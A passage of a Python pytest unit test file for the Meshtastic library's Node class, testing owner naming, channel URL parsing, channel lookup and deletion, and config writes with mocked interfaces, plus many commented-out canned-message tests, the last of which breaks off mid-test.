# message_201_chars_long = 'a' * 201
# anode.set_canned_message(message_201_chars_long)
# assert re.search(r" part 1", caplog.text, re.MULTILINE)
# assert re.search(r"Setting canned message 'a' part 2", caplog.text, re.MULTILINE)
#
#
#@pytest.mark.unit
#def test_node_set_canned_message_1000(caplog):
# """Test run set_canned_message() 1000 characters long"""
# iface = MagicMock(autospec=SerialInterface)
# amesg = MagicMock(autospec=AdminMessage)
# with caplog.at_level(logging.DEBUG):
# with patch('meshtastic.serial_interface.SerialInterface', return_value=iface) as mo:
# with patch('meshtastic.admin_pb2.AdminMessage', return_value=amesg):
# anode = Node(mo, 'bar')
# message_1000_chars_long = 'a' * 1000
# anode.set_canned_message(message_1000_chars_long)
# assert re.search(r" part 1", caplog.text, re.MULTILINE)
# assert re.search(r" part 2", caplog.text, re.MULTILINE)
# assert re.search(r" part 3", caplog.text, re.MULTILINE)
# assert re.search(r" part 4", caplog.text, re.MULTILINE)
# assert re.search(r" part 5", caplog.text, re.MULTILINE)
#
#
#@pytest.mark.unit
#def test_node_set_canned_message_1001(capsys):
# """Test run set_canned_message() 1001 characters long"""
# iface = MagicMock(autospec=SerialInterface)
# with pytest.raises(SystemExit) as pytest_wrapped_e:
# with patch('meshtastic.serial_interface.SerialInterface', return_value=iface) as mo:
# anode = Node(mo, 'bar')
# message_1001_chars_long = 'a' * 1001
# anode.set_canned_message(message_1001_chars_long)
# assert pytest_wrapped_e.type == SystemExit
# assert pytest_wrapped_e.value.code == 1
# out, err = capsys.readouterr()
# assert re.search(r'Warning: The canned message', out, re.MULTILINE)
# assert err == ''
@pytest.mark.unit
def test_setOwner_and_team(caplog):
    """setOwner with long name, short name and team should log every field."""
    node = Node('foo', 'bar', noProto=True)
    with caplog.at_level(logging.DEBUG):
        node.setOwner(long_name='Test123', short_name='123', team=1)
    expected_patterns = (
        r'p.set_owner.long_name:Test123:',
        r'p.set_owner.short_name:123:',
        r'p.set_owner.is_licensed:False',
        r'p.set_owner.team:1',
    )
    for pattern in expected_patterns:
        assert re.search(pattern, caplog.text, re.MULTILINE)
@pytest.mark.unit
def test_setOwnerShort(caplog):
    """setOwner with only a short name should log that short name."""
    node = Node('foo', 'bar', noProto=True)
    with caplog.at_level(logging.DEBUG):
        node.setOwner(long_name=None, short_name='123')
    assert re.search(r'p.set_owner.short_name:123:', caplog.text, re.MULTILINE)
@pytest.mark.unit
def test_setOwner_no_short_name(caplog):
    """Without a short name, setOwner derives one from the long name."""
    node = Node('foo', 'bar', noProto=True)
    with caplog.at_level(logging.DEBUG):
        node.setOwner(long_name='Test123')
    expected_patterns = (
        r'p.set_owner.long_name:Test123:',
        r'p.set_owner.short_name:Tst:',
        r'p.set_owner.is_licensed:False',
        r'p.set_owner.team:0',
    )
    for pattern in expected_patterns:
        assert re.search(pattern, caplog.text, re.MULTILINE)
@pytest.mark.unit
def test_setOwner_no_short_name_and_long_name_is_short(caplog):
    """A three-character long name should be reused verbatim as the short name."""
    node = Node('foo', 'bar', noProto=True)
    with caplog.at_level(logging.DEBUG):
        node.setOwner(long_name='Tnt')
    expected_patterns = (
        r'p.set_owner.long_name:Tnt:',
        r'p.set_owner.short_name:Tnt:',
        r'p.set_owner.is_licensed:False',
        r'p.set_owner.team:0',
    )
    for pattern in expected_patterns:
        assert re.search(pattern, caplog.text, re.MULTILINE)
@pytest.mark.unit
def test_setOwner_no_short_name_and_long_name_has_words(caplog):
    """A multi-word long name should produce an initials-based short name."""
    node = Node('foo', 'bar', noProto=True)
    with caplog.at_level(logging.DEBUG):
        node.setOwner(long_name='A B C', is_licensed=True)
    expected_patterns = (
        r'p.set_owner.long_name:A B C:',
        r'p.set_owner.short_name:ABC:',
        r'p.set_owner.is_licensed:True',
        r'p.set_owner.team:0',
    )
    for pattern in expected_patterns:
        assert re.search(pattern, caplog.text, re.MULTILINE)
@pytest.mark.unit
def test_setOwner_long_name_no_short(caplog):
    """A single-word long name should be truncated to form the short name."""
    node = Node('foo', 'bar', noProto=True)
    with caplog.at_level(logging.DEBUG):
        node.setOwner(long_name='Aabo', is_licensed=True)
    assert re.search(r'p.set_owner.long_name:Aabo:', caplog.text, re.MULTILINE)
    assert re.search(r'p.set_owner.short_name:Aab:', caplog.text, re.MULTILINE)
@pytest.mark.unit
def test_exitSimulator(caplog):
    """exitSimulator should emit its debug log entry."""
    node = Node('foo', 'bar', noProto=True)
    with caplog.at_level(logging.DEBUG):
        node.exitSimulator()
    assert re.search(r'in exitSimulator', caplog.text, re.MULTILINE)
@pytest.mark.unit
def test_reboot(caplog):
    """reboot should log that the node is being told to reboot."""
    node = Node('foo', 'bar', noProto=True)
    with caplog.at_level(logging.DEBUG):
        node.reboot()
    assert re.search(r'Telling node to reboot', caplog.text, re.MULTILINE)
@pytest.mark.unit
def test_shutdown(caplog):
    """shutdown should log that the node is being told to shutdown."""
    node = Node('foo', 'bar', noProto=True)
    with caplog.at_level(logging.DEBUG):
        node.shutdown()
    assert re.search(r'Telling node to shutdown', caplog.text, re.MULTILINE)
@pytest.mark.unit
def test_setURL_empty_url(capsys):
    """Test setURL with an empty URL: it should warn and exit with code 1.

    The docstring previously read "Test reboot", which misdescribed the
    test; it actually exercises setURL before any RadioConfig is read.
    """
    anode = Node('foo', 'bar', noProto=True)
    with pytest.raises(SystemExit) as pytest_wrapped_e:
        anode.setURL('')
    assert pytest_wrapped_e.type == SystemExit
    assert pytest_wrapped_e.value.code == 1
    out, err = capsys.readouterr()
    assert re.search(r'Warning: No RadioConfig has been read', out, re.MULTILINE)
    assert err == ''
@pytest.mark.unit
def test_setURL_valid_URL(caplog):
    """setURL with a well-formed channel URL should log the decoded channel."""
    mock_iface = MagicMock(autospec=SerialInterface)
    url = "https://www.meshtastic.org/d/#CgUYAyIBAQ"
    with caplog.at_level(logging.DEBUG):
        node = Node(mock_iface, 'bar', noProto=True)
        node.radioConfig = 'baz'
        node.channels = ['zoo']
        node.setURL(url)
    expected_patterns = (
        r'Channel i:0',
        r'modem_config: MidSlow',
        r'psk: "\\001"',
        r'role: PRIMARY',
    )
    for pattern in expected_patterns:
        assert re.search(pattern, caplog.text, re.MULTILINE)
@pytest.mark.unit
def test_setURL_valid_URL_but_no_settings(capsys):
    """A URL that carries no channel settings should warn and exit with code 1."""
    mock_iface = MagicMock(autospec=SerialInterface)
    url = "https://www.meshtastic.org/d/#"
    with pytest.raises(SystemExit) as exc_info:
        node = Node(mock_iface, 'bar', noProto=True)
        node.radioConfig = 'baz'
        node.setURL(url)
    assert exc_info.type == SystemExit
    assert exc_info.value.code == 1
    out, err = capsys.readouterr()
    assert re.search(r'Warning: There were no settings', out, re.MULTILINE)
    assert err == ''
@pytest.mark.unit
def test_showChannels(capsys):
    """showChannels should print primary and secondary channel details."""
    node = Node('foo', 'bar')
    # Channel roles: 0=Disabled, 1=Primary, 2=Secondary; modem_config: 0-5.
    primary = Channel(index=1, role=1)
    primary.settings.modem_config = 3
    primary.settings.psk = b'\x01'
    secondary = Channel(index=2, role=2)
    secondary.settings.psk = b'\x8a\x94y\x0e\xc6\xc9\x1e5\x91\x12@\xa60\xa8\xb43\x87\x00\xf2K\x0e\xe7\x7fAz\xcd\xf5\xb0\x900\xa84'
    secondary.settings.name = 'testing'
    # Remaining channel slots are disabled.
    disabled = [Channel(index=i, role=0) for i in range(3, 9)]
    node.channels = [primary, secondary] + disabled
    node.showChannels()
    out, err = capsys.readouterr()
    assert re.search(r'Channels:', out, re.MULTILINE)
    # Primary-channel output.
    primary_patterns = (
        r'Primary channel URL',
        r'PRIMARY psk=default ',
        r'"modemConfig": "MidSlow"',
        r'"psk": "AQ=="',
    )
    for pattern in primary_patterns:
        assert re.search(pattern, out, re.MULTILINE)
    # Secondary-channel output.
    assert re.search(r'SECONDARY psk=secret ', out, re.MULTILINE)
    assert re.search(r'"psk": "ipR5DsbJHjWREkCmMKi0M4cA8ksO539Bes31sJAwqDQ="', out, re.MULTILINE)
    assert err == ''
@pytest.mark.unit
def test_getChannelByChannelIndex():
    """getChannelByChannelIndex: valid indexes hit, out-of-range misses."""
    anode = Node('foo', 'bar')
    # slot 0 is the primary, slot 1 the secondary, the rest disabled
    roles = [1, 2, 0, 0, 0, 0, 0, 0]
    anode.channels = [Channel(index=i + 1, role=r) for i, r in enumerate(roles)]
    # primary, secondary, and disabled channels can all be looked up
    for idx in (0, 1, 2):
        assert anode.getChannelByChannelIndex(idx) is not None
    # invalid values yield None
    for idx in (-1, 9):
        assert anode.getChannelByChannelIndex(idx) is None
@pytest.mark.unit
def test_deleteChannel_try_to_delete_primary_channel(capsys):
    """Deleting the PRIMARY channel must warn and exit(1)."""
    anode = Node('foo', 'bar')
    primary = Channel(index=1, role=1)
    primary.settings.modem_config = 3
    primary.settings.psk = b'\x01'
    # no secondary channels; everything else disabled
    anode.channels = [primary] + [Channel(index=i, role=0) for i in range(2, 9)]
    with pytest.raises(SystemExit) as excinfo:
        anode.deleteChannel(0)
    assert excinfo.type == SystemExit
    assert excinfo.value.code == 1
    out, err = capsys.readouterr()
    assert re.search(r'Warning: Only SECONDARY channels can be deleted', out, re.MULTILINE)
    assert err == ''
@pytest.mark.unit
def test_deleteChannel_secondary():
    """Deleting a secondary channel keeps 8 slots and blanks the deleted name."""
    primary = Channel(index=1, role=1)
    primary.settings.modem_config = 3
    primary.settings.psk = b'\x01'
    secondary = Channel(index=2, role=2)
    secondary.settings.psk = b'\x8a\x94y\x0e\xc6\xc9\x1e5\x91\x12@\xa60\xa8\xb43\x87\x00\xf2K\x0e\xe7\x7fAz\xcd\xf5\xb0\x900\xa84'
    secondary.settings.name = 'testing'
    channels = [primary, secondary] + [Channel(index=i, role=0) for i in range(3, 9)]
    iface = MagicMock(autospec=SerialInterface)
    with patch('meshtastic.serial_interface.SerialInterface', return_value=iface) as mo:
        mo.localNode.getChannelByName.return_value = None
        mo.myInfo.max_channels = 8
        anode = Node(mo, 'bar', noProto=True)
        anode.channels = channels
        # before: 8 slots, 'testing' in slot 1, the rest unnamed
        assert len(anode.channels) == 8
        assert channels[0].settings.modem_config == 3
        assert channels[1].settings.name == 'testing'
        for ch in channels[2:]:
            assert ch.settings.name == ''
        anode.deleteChannel(1)
        # after: still 8 slots, 'testing' gone, everything past the primary unnamed
        assert len(anode.channels) == 8
        assert channels[0].settings.modem_config == 3
        for ch in channels[1:]:
            assert ch.settings.name == ''
@pytest.mark.unit
def test_deleteChannel_secondary_with_admin_channel_after_testing():
    """Deleting a secondary channel shifts a later 'admin' channel down one slot."""
    primary = Channel(index=1, role=1)
    primary.settings.modem_config = 3
    primary.settings.psk = b'\x01'
    testing = Channel(index=2, role=2)
    testing.settings.psk = b'\x8a\x94y\x0e\xc6\xc9\x1e5\x91\x12@\xa60\xa8\xb43\x87\x00\xf2K\x0e\xe7\x7fAz\xcd\xf5\xb0\x900\xa84'
    testing.settings.name = 'testing'
    admin = Channel(index=3, role=2)
    admin.settings.name = 'admin'
    channels = [primary, testing, admin] + [Channel(index=i, role=0) for i in range(4, 9)]
    iface = MagicMock(autospec=SerialInterface)
    with patch('meshtastic.serial_interface.SerialInterface', return_value=iface) as mo:
        mo.localNode.getChannelByName.return_value = None
        mo.myInfo.max_channels = 8
        anode = Node(mo, 'bar', noProto=True)
        # Note: Have to do this next line because every call to MagicMock object/method returns a new magic mock
        mo.localNode = anode
        assert mo.localNode == anode
        anode.channels = channels
        # before: 'testing' at slot 1, 'admin' at slot 2
        assert len(anode.channels) == 8
        assert channels[0].settings.modem_config == 3
        assert channels[1].settings.name == 'testing'
        assert channels[2].settings.name == 'admin'
        for ch in channels[3:]:
            assert ch.settings.name == ''
        anode.deleteChannel(1)
        # after: 'admin' moved into slot 1, everything beyond it unnamed
        assert len(anode.channels) == 8
        assert channels[0].settings.modem_config == 3
        assert channels[1].settings.name == 'admin'
        for ch in channels[2:]:
            assert ch.settings.name == ''
@pytest.mark.unit
def test_deleteChannel_secondary_with_admin_channel_before_testing():
    """Deleting a secondary channel after 'admin' leaves 'admin' in place."""
    primary = Channel(index=1, role=1)
    primary.settings.modem_config = 3
    primary.settings.psk = b'\x01'
    admin = Channel(index=2, role=2)
    admin.settings.psk = b'\x8a\x94y\x0e\xc6\xc9\x1e5\x91\x12@\xa60\xa8\xb43\x87\x00\xf2K\x0e\xe7\x7fAz\xcd\xf5\xb0\x900\xa84'
    admin.settings.name = 'admin'
    testing = Channel(index=3, role=2)
    testing.settings.name = 'testing'
    channels = [primary, admin, testing] + [Channel(index=i, role=0) for i in range(4, 9)]
    iface = MagicMock(autospec=SerialInterface)
    with patch('meshtastic.serial_interface.SerialInterface', return_value=iface) as mo:
        mo.localNode.getChannelByName.return_value = None
        mo.myInfo.max_channels = 8
        anode = Node(mo, 'bar', noProto=True)
        anode.channels = channels
        # before: 'admin' at slot 1, 'testing' at slot 2
        assert len(anode.channels) == 8
        assert channels[0].settings.modem_config == 3
        assert channels[1].settings.name == 'admin'
        assert channels[2].settings.name == 'testing'
        for ch in channels[3:]:
            assert ch.settings.name == ''
        anode.deleteChannel(2)
        # after: 'admin' untouched, 'testing' removed
        assert len(anode.channels) == 8
        assert channels[0].settings.modem_config == 3
        assert channels[1].settings.name == 'admin'
        for ch in channels[2:]:
            assert ch.settings.name == ''
@pytest.mark.unit
def test_getChannelByName():
    """Get a channel by the name."""
    anode = Node('foo', 'bar')
    primary = Channel(index=1, role=1)
    primary.settings.modem_config = 3
    primary.settings.psk = b'\x01'
    admin = Channel(index=2, role=2)
    admin.settings.psk = b'\x8a\x94y\x0e\xc6\xc9\x1e5\x91\x12@\xa60\xa8\xb43\x87\x00\xf2K\x0e\xe7\x7fAz\xcd\xf5\xb0\x900\xa84'
    admin.settings.name = 'admin'
    anode.channels = [primary, admin] + [Channel(index=i, role=0) for i in range(3, 9)]
    found = anode.getChannelByName('admin')
    assert found.index == 2
@pytest.mark.unit
def test_getChannelByName_invalid_name():
    """Get a channel by the name but one that is not present."""
    anode = Node('foo', 'bar')
    primary = Channel(index=1, role=1)
    primary.settings.modem_config = 3
    primary.settings.psk = b'\x01'
    admin = Channel(index=2, role=2)
    admin.settings.psk = b'\x8a\x94y\x0e\xc6\xc9\x1e5\x91\x12@\xa60\xa8\xb43\x87\x00\xf2K\x0e\xe7\x7fAz\xcd\xf5\xb0\x900\xa84'
    admin.settings.name = 'admin'
    anode.channels = [primary, admin] + [Channel(index=i, role=0) for i in range(3, 9)]
    # 'testing' is not configured anywhere, so the lookup misses
    assert anode.getChannelByName('testing') is None
@pytest.mark.unit
def test_getDisabledChannel():
    """Get the first disabled channel."""
    anode = Node('foo', 'bar')
    primary = Channel(index=1, role=1)
    primary.settings.modem_config = 3
    primary.settings.psk = b'\x01'
    secondaries = []
    for idx, name in ((2, 'testingA'), (3, 'testingB')):
        sec = Channel(index=idx, role=2)
        sec.settings.psk = b'\x8a\x94y\x0e\xc6\xc9\x1e5\x91\x12@\xa60\xa8\xb43\x87\x00\xf2K\x0e\xe7\x7fAz\xcd\xf5\xb0\x900\xa84'
        sec.settings.name = name
        secondaries.append(sec)
    anode.channels = [primary] + secondaries + [Channel(index=i, role=0) for i in range(4, 9)]
    # slots 1-3 are in use, so the first disabled channel is index 4
    found = anode.getDisabledChannel()
    assert found.index == 4
@pytest.mark.unit
def test_getDisabledChannel_where_all_channels_are_used():
    """When every slot is active, getDisabledChannel returns None."""
    anode = Node('foo', 'bar')
    primary = Channel(index=1, role=1)
    primary.settings.modem_config = 3
    primary.settings.psk = b'\x01'
    # every remaining slot is an active secondary channel
    anode.channels = [primary] + [Channel(index=i, role=2) for i in range(2, 9)]
    assert anode.getDisabledChannel() is None
@pytest.mark.unit
def test_getAdminChannelIndex():
    """Get the 'admin' channel index."""
    anode = Node('foo', 'bar')
    primary = Channel(index=1, role=1)
    primary.settings.modem_config = 3
    primary.settings.psk = b'\x01'
    admin = Channel(index=2, role=2)
    admin.settings.psk = b'\x8a\x94y\x0e\xc6\xc9\x1e5\x91\x12@\xa60\xa8\xb43\x87\x00\xf2K\x0e\xe7\x7fAz\xcd\xf5\xb0\x900\xa84'
    admin.settings.name = 'admin'
    anode.channels = [primary, admin] + [Channel(index=i, role=0) for i in range(3, 9)]
    assert anode._getAdminChannelIndex() == 2
@pytest.mark.unit
def test_getAdminChannelIndex_when_no_admin_named_channel():
    """Get the 'admin' channel when there is not one."""
    anode = Node('foo', 'bar')
    primary = Channel(index=1, role=1)
    primary.settings.modem_config = 3
    primary.settings.psk = b'\x01'
    anode.channels = [primary] + [Channel(index=i, role=0) for i in range(2, 9)]
    # with no channel named 'admin', index 0 is returned
    assert anode._getAdminChannelIndex() == 0
# TODO: should we check if we need to turn it off?
@pytest.mark.unit
def test_turnOffEncryptionOnPrimaryChannel(capsys):
    """Turn off encryption when there is a psk."""
    anode = Node('foo', 'bar', noProto=True)
    primary = Channel(index=1, role=1)
    primary.settings.modem_config = 3
    # value from using "--ch-set psk 0x1a1a1a1a2b2b2b2b1a1a1a1a2b2b2b2b1a1a1a1a2b2b2b2b1a1a1a1a2b2b2b2b "
    primary.settings.psk = b'\x1a\x1a\x1a\x1a++++\x1a\x1a\x1a\x1a++++\x1a\x1a\x1a\x1a++++\x1a\x1a\x1a\x1a++++'
    anode.channels = [primary] + [Channel(index=i, role=0) for i in range(2, 9)]
    anode.turnOffEncryptionOnPrimaryChannel()
    out, err = capsys.readouterr()
    assert re.search(r'Writing modified channels to device', out)
    assert err == ''
@pytest.mark.unit
def test_writeConfig_with_no_radioConfig(capsys):
    """writeConfig without a radioConfig should print an error and exit(1)."""
    anode = Node('foo', 'bar', noProto=True)
    with pytest.raises(SystemExit) as excinfo:
        anode.writeConfig()
    assert excinfo.type == SystemExit
    assert excinfo.value.code == 1
    out, err = capsys.readouterr()
    assert re.search(r'Error: No RadioConfig has been read', out)
    assert err == ''
@pytest.mark.unit
def test_writeConfig(caplog):
    """writeConfig with a radioConfig set should log the write."""
    anode = Node('foo', 'bar', noProto=True)
    anode.radioConfig = RadioConfig()
    with caplog.at_level(logging.DEBUG):
        anode.writeConfig()
        assert re.search(r'Wrote config', caplog.text, re.MULTILINE)
@pytest.mark.unit
def test_requestChannel_not_localNode(caplog, capsys):
    """_requestChannel on a node that is not localNode goes to the remote path."""
    iface = MagicMock(autospec=SerialInterface)
    with patch('meshtastic.serial_interface.SerialInterface', return_value=iface) as mo:
        mo.localNode.getChannelByName.return_value = None
        mo.myInfo.max_channels = 8
        anode = Node(mo, 'bar', noProto=True)
        with caplog.at_level(logging.DEBUG):
            anode._requestChannel(0)
            # anode is not mo.localNode here, so the remote-node message appears
            assert re.search(r'Requesting channel 0 info from remote node', caplog.text, re.MULTILINE)
            out, err = capsys.readouterr()
            assert re.search(r'Requesting channel 0 info', out, re.MULTILINE)
            assert err == ''
@pytest.mark.unit
def test_requestChannel_localNode(caplog):
    """_requestChannel on the local node must not use the remote-node path."""
    iface = MagicMock(autospec=SerialInterface)
    with patch('meshtastic.serial_interface.SerialInterface', return_value=iface) as mo:
        mo.localNode.getChannelByName.return_value = None
        mo.myInfo.max_channels = 8
        anode = Node(mo, 'bar', noProto=True)
        # Note: Have to do this next line because every call to MagicMock object/method returns a new magic mock
        mo.localNode = anode
        with caplog.at_level(logging.DEBUG):
            anode._requestChannel(0)
            assert re.search(r'Requesting channel 0', caplog.text, re.MULTILINE)
            assert not re.search(r'from remote node', caplog.text, re.MULTILINE)
#@pytest.mark.unit
#def test_onResponseRequestCannedMessagePluginMesagePart1(caplog):
# """Test onResponseRequestCannedMessagePluginMessagePart1()"""
#
# part1 = CannedMessagePluginMessagePart1()
# part1.text = 'foo1'
#
# msg1 = MagicMock(autospec=AdminMessage)
# msg1.get_canned_message_plugin_part1_response = part1
#
# packet = {
# 'from': 682968612,
# 'to': 682968612,
# 'decoded': {
# 'portnum': 'ADMIN_APP',
# 'payload': 'faked',
# 'requestId': 927039000,
# 'admin': {
# 'getCannedMessagePluginPart1Response': {'text': 'foo1'},
# 'raw': msg1
# }
# },
# 'id': 589440320,
# 'rxTime': 1642710843,
# 'hopLimit': 3,
# 'priority': 'RELIABLE',
# 'raw': 'faked',
# 'fromId': '!28b54624',
# 'toId': '!28b54624'
# }
#
# iface = MagicMock(autospec=SerialInterface)
# with patch('meshtastic.serial_interface.SerialInterface', return_value=iface) as mo:
# anode = Node(mo, 'bar', noProto=True)
# # Note: Have to do this next line because every call to MagicMock object/method returns a new magic mock
# mo.localNode = anode
#
# with caplog.at_level(logging.DEBUG):
# anode.onResponseRequestCannedMessagePluginMessagePart1(packet)
# assert re.search(r'onResponseRequestCannedMessagePluginMessagePart1', caplog.text, re.MULTILINE)
# assert anode.cannedPluginMessagePart1 == 'foo1'
#@pytest.mark.unit
#def test_onResponseRequestCannedMessagePluginMesagePart2(caplog):
# """Test onResponseRequestCannedMessagePluginMessagePart2()"""
#
# part2 = CannedMessagePluginMessagePart2()
# part2.text = 'foo2'
#
# msg2 = MagicMock(autospec=AdminMessage)
# msg2.get_canned_message_plugin_part2_response = part2
#
# packet = {
# 'from': 682968612,
# 'to': 682968612,
# 'decoded': {
# 'portnum': 'ADMIN_APP',
# 'payload': 'faked',
# 'requestId': 927039000,
# 'admin': {
# 'getCannedMessagePluginPart2Response': {'text': 'foo2'},
# 'raw': msg2
# }
# },
# 'id': 589440320,
# 'rxTime': 1642710843,
# 'hopLimit': 3,
# 'priority': 'RELIABLE',
# 'raw': 'faked',
# 'fromId': '!28b54624',
# 'toId': '!28b54624'
# }
#
# iface = MagicMock(autospec=SerialInterface)
# with patch('meshtastic.serial_interface.SerialInterface', return_value=iface) as mo:
# anode = Node(mo, 'bar', noProto=True)
# # Note: Have to do this next line because every call to MagicMock object/method returns a new magic mock
# mo.localNode = anode
#
# with caplog.at_level(logging.DEBUG):
# anode.onResponseRequestCannedMessagePluginMessagePart2(packet)
# assert re.search(r'onResponseRequestCannedMessagePluginMessagePart2', caplog.text, re.MULTILINE)
# assert anode.cannedPluginMessagePart2 == 'foo2'
#@pytest.mark.unit
#def test_onResponseRequestCannedMessagePluginMesagePart3(caplog):
# """Test onResponseRequestCannedMessagePluginMessagePart3()"""
#
# part3 = CannedMessagePluginMessagePart3()
# part3.text = 'foo3'
#
# msg3 = MagicMock(autospec=AdminMessage)
# msg3.get_canned_message_plugin_part3_response = part3
#
# packet = {
# 'from': 682968612,
# 'to': 682968612,
# 'decoded': {
# 'portnum': 'ADMIN_APP',
# 'payload': 'faked',
# 'requestId': 927039000,
# 'admin': {
# 'getCannedMessagePluginPart3Response': {'text': 'foo3'},
# 'raw': msg3
# }
# },
# 'id': 589440320,
# 'rxTime': 1642710843,
# 'hopLimit': 3,
# 'priority': 'RELIABLE',
# 'raw': 'faked',
# 'fromId': '!28b54624',
# 'toId': '!28b54624'
# }
#
# iface = MagicMock(autospec=SerialInterface)
# with patch('meshtastic.serial_interface.SerialInterface', return_value=iface) as mo:
# anode = Node(mo, 'bar', noProto=True)
# # Note: Have to do this next line because every call to MagicMock object/method returns a new magic mock
# mo.localNode = anode
#
# with caplog.at_level(logging.DEBUG):
# anode.onResponseRequestCannedMessagePluginMessagePart3(packet)
# assert re.search(r'onResponseRequestCannedMessagePluginMessagePart3', caplog.text, re.MULTILINE)
# assert anode.cannedPluginMessagePart3 == 'foo3'
#@pytest.mark.unit
#def test_onResponseRequestCannedMessagePluginMesagePart4(caplog):
# """Test onResponseRequestCannedMessagePluginMessagePart4()"""
#
# part4 = CannedMessagePluginMessagePart4()
# part4.text = 'foo4'
#
# msg4 = MagicMock(autospec=AdminMessage)
# msg4.get_canned_message_plugin_part4_response = part4
#
# packet = {
# 'from': 682968612,
# 'to': 682968612,
# 'decoded': {
# 'portnum': 'ADMIN_APP',
# 'payload': 'faked',
# 'requestId': 927039000,
# 'admin': {
# 'getCannedMessagePluginPart4Response': {'text': 'foo4'},
# 'raw': msg4
# }
# },
# 'id': 589440320,
# 'rxTime': 1642710843,
# 'hopLimit': 3,
# 'priority': 'RELIABLE',
# 'raw': 'faked',
# 'fromId': '!28b54624',
# 'toId': '!28b54624'
# }
#
# iface = MagicMock(autospec=SerialInterface)
# with patch('meshtastic.serial_interface.SerialInterface', return_value=iface) as mo:
# anode = Node(mo, 'bar', noProto=True)
# # Note: Have to do this next line because every call to MagicMock object/method returns a new magic mock
# mo.localNode = anode
#
# with caplog.at_level(logging.DEBUG):
# anode.onResponseRequestCannedMessagePluginMessagePart4(packet)
# assert re.search(r'onResponseRequestCannedMessagePluginMessagePart4', caplog.text, re.MULTILINE)
# assert anode.cannedPluginMessagePart4 == 'foo4'
#@pytest.mark.unit
#def test_onResponseRequestCannedMessagePluginMesagePart5(caplog):
# """Test onResponseRequestCannedMessagePluginMessagePart5()"""
#
# part5 = CannedMessagePluginMessagePart5()
# part5.text = 'foo5'
#
# msg5 = MagicMock(autospec=AdminMessage)
# msg5.get_canned_message_plugin_part5_response = part5
#
#
# packet = {
# 'from': 682968612,
# 'to': 682968612,
# 'decoded': {
# 'portnum': 'ADMIN_APP',
# 'payload': 'faked',
# 'requestId': 927039000,
# 'admin': {
# 'getCannedMessagePluginPart5Response': {'text': 'foo5'},
# 'raw': msg5
# }
# },
# 'id': 589440320,
# 'rxTime': 1642710843,
# 'hopLimit': 3,
# 'priority': 'RELIABLE',
# 'raw': 'faked',
# 'fromId': '!28b54624',
# 'toId': '!28b54624'
# }
#
# iface = MagicMock(autospec=SerialInterface)
# with patch('meshtastic.serial_interface.SerialInterface', return_value=iface) as mo:
# anode = Node(mo, 'bar', noProto=True)
# # Note: Have to do this next line because every call to MagicMock object/method returns a new magic mock
# mo.localNode = anode
#
# with caplog.at_level(logging.DEBUG):
# anode.onResponseRequestCannedMessagePluginMessagePart5(packet)
# assert re.search(r'onResponseRequestCannedMessagePluginMessagePart5', caplog.text, re.MULTILINE)
# assert anode.cannedPluginMessagePart5 == 'foo5'
#@pytest.mark.unit
#def test_onResponseRequestCannedMessagePluginMesagePart1_error(caplog, capsys):
# """Test onResponseRequestCannedMessagePluginMessagePart1() with error"""
#
# packet = {
# 'decoded': {
# 'routing': {
# 'errorReason': 'some made up error',
# },
# },
# }
#
# iface = MagicMock(autospec=SerialInterface)
# with patch('meshtastic.serial_interface.SerialInterface', return_value=iface) as mo:
# anode = Node(mo, 'bar', noProto=True)
# # Note: Have to do this next line because every call to MagicMock object/method returns a new magic mock
# mo.localNode = anode
#
# with caplog.at_level(logging.DEBUG):
# anode.onResponseRequestCannedMessagePluginMessagePart1(packet)
# assert re.search(r'onResponseRequestCannedMessagePluginMessagePart1', caplog.text, re.MULTILINE)
# out, err = capsys.readouterr()
# assert re.search(r'Error on response', out)
# assert err == ''
#@pytest.mark.unit
#def test_onResponseRequestCannedMessagePluginMesagePart2_error(caplog, capsys):
# """Test onResponseRequestCannedMessagePluginMessagePart2() with error"""
#
# packet = {
# 'decoded': {
# 'routing': {
# 'errorReason': 'some made up error',
# },
# },
# }
#
# iface = MagicMock(autospec=SerialInterface)
# with patch('meshtastic.serial_interface.SerialInterface', return_value=iface) as mo:
# anode = Node(mo, 'bar', noProto=True)
# # Note: Have to do this next line because every call to MagicMock object/method returns a new magic mock
# mo.localNode = anode
#
# with caplog.at_level(logging.DEBUG):
# anode.onResponseRequestCannedMessagePluginMessagePart2(packet)
# assert re.search(r'onResponseRequestCannedMessagePluginMessagePart2', caplog.text, re.MULTILINE)
# out, err = capsys.readouterr()
# assert re.search(r'Error on response', out)
# assert err == ''
#@pytest.mark.unit
#def test_onResponseRequestCannedMessagePluginMesagePart3_error(caplog, capsys):
# """Test onResponseRequestCannedMessagePluginMessagePart3() with error"""
#
# packet = {
# 'decoded': {
# 'routing': {
# 'errorReason': 'some made up error',
# },
# },
# }
#
# iface = MagicMock(autospec=SerialInterface)
# with patch('meshtastic.serial_interface.SerialInterface', return_value=iface) as mo:
# anode = Node(mo, 'bar', noProto=True)
# # Note: Have to do this next line because every call to MagicMock object/method returns a new magic mock
# mo.localNode = anode
#
# with caplog.at_level(logging.DEBUG):
# anode.onResponseRequestCannedMessagePluginMessagePart3(packet)
# assert re.search(r'onResponseRequestCannedMessagePluginMessagePart3', caplog.text, re.MULTILINE)
# out, err = capsys.readouterr()
# assert re.search(r'Error on response', out)
# assert err == ''
#
#
#@pytest.mark.unit
#def test_onResponseRequestCannedMessagePluginMesagePart4_error(caplog, capsys):
# """Test onResponseRequestCannedMessagePluginMessagePart4() with error"""
#
# packet = {
# 'decoded': {
# 'routing': {
# 'errorReason': 'some made up error',
# },
# },
# }
#
# iface = MagicMock(autospec=SerialInterface)
# with patch('meshtastic.serial_interface.SerialInterface', return_value=iface) as mo:
# anode = Node(mo, 'bar', noProto=True)
# # Note: Have to do this next line because every call to MagicMock object/method returns a new magic mock
# mo.localNode = anode
#
# with caplog.at_level(logging.DEBUG):
# anode.onResponseRequestCannedMessagePluginMessagePart4(packet)
# assert re.search(r'onResponseRequestCannedMessagePluginMessagePart4', caplog.text, re.MULTILINE)
# out, err = capsys.readouterr()
# assert re.search(r'Error on response', out)
# assert err == ''
#
#
#@pytest.mark.unit
#def test_onResponseRequestCannedMessagePluginMesagePart5_error(caplog, capsys):
# """Test onResponseRequestCannedMessagePluginMessagePart5() with error"""
#
# packet = {
# 'decoded': {
# 'routing': {
# 'errorReason': 'some made up error',
# },
# },
# }
#
# iface = MagicMock(autospec=SerialInterface)
# with patch('meshtastic.serial_interface.SerialInterface', return_value=iface) as mo:
# anode = Node(mo, 'bar', noProto=True)
# # Note: Have to do this next line because every call to MagicMock object/method returns a new magic mock
# mo.localNode = anode
#
# with caplog.at_level(logging.DEBUG):
# anode.onResponseRequestCannedMessagePluginMessagePart5(packet)
